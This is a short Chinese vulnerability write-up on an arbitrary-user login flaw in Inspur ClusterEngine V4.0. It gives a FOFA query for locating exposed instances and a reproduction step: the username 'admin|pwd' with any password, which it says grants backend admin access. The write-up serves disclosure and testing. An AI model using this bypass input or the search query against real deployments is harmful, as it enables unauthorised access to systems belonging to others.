# 浪潮ClusterEngineV4.0 任意用户登录漏洞
## 漏洞描述
浪潮ClusterEngineV4.0 存在任意用户登录漏洞,构造恶意的用户名和密码即可获取后台权限
## 漏洞影响
> [!NOTE]
>
> 浪潮ClusterEngineV4.0
## FOFA
> [!NOTE]
>
> title=”TSCEV4.0″
## 漏洞复现
登录页面如下
“`
USER: admin|pwd
PASS: 任意
“`
成功登陆后台
> [!NOTE]
>
> 部分功能是无法使用的
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
